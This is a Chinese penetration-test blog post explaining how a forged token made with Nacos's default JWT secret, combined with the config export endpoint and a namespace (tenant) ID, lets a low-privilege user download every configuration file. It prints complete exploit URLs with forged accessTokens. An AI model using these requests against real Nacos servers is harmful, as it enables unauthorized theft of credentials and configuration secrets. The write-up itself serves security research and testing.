Nacos普通用户功能受限

admin 2024年6月20日10:46:59评论35 views字数 1017阅读3分23秒阅读模式
     众所周知当nacos存在默认密钥配置漏洞的时候就可以直接添加用户进入后台,在实际渗透测试中,同事把他使用nacos默认密钥配置漏洞添加的用户账号密码以及网站丢给了我,给我说没办法看配置文件让我瞅瞅。

Nacos普通用户功能受限

登录后查看确实如此,提示权限认证失败。

Nacos普通用户功能受限

当时想都是默认密钥了,直接使用默认密钥生成一个nacos的Token然后访问不就行了,奇怪的是当我用生成的Token访问时直接给我闪退了,另外一种就是利用默认配置改密码由于是正式环境所以这个方法先放着。

想到之前我写过一篇文章不用登录直接下载配置信息,当时那个漏洞本质是对用户权限校验不严格导致的,如果我在之前的参数基础上添加上nacos的accessToken值然后再去下载配置信息呢。

http://xxx.xx.xx.xxx:8848/nacos/v1/cs/configs?export=true&tenant=&group=&appName=&dataId=&ids=&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNzE4Nzg3Mzg4fQ.S1sP8_yj78IBa8G9thFe1euS7eBxuBdkFr2OsKN3XFM

也是给他下载出来了

Nacos普通用户功能受限

我把压缩包发给了同事,同事看了之后说,我只是把public的配置文件下载出来了其他还有好多没下载出来,我研究了下数据包发现tenant参数控制命名空间ID,比如是我要下载下图当中空间名称为VPN的配置文件,我就需要让tenant等于VPN的空间ID也就是60788b51-f01e-4319-ba4e-d54d16324fcf。

Nacos普通用户功能受限

完整的下载数据包就是

http://xxx.xx.xx.xxx:8848/nacos/v1/cs/configs?export=true&tenant=60788b51-f01e-4319-ba4e-d54d16324fcf&group=&appName=&dataId=&ids=&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q

 

原文始发于微信公众号(思极安全实验室):Nacos普通用户功能受限(水一篇)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月20日10:46:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos普通用户功能受限https://cn-sec.com/archives/2865321.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息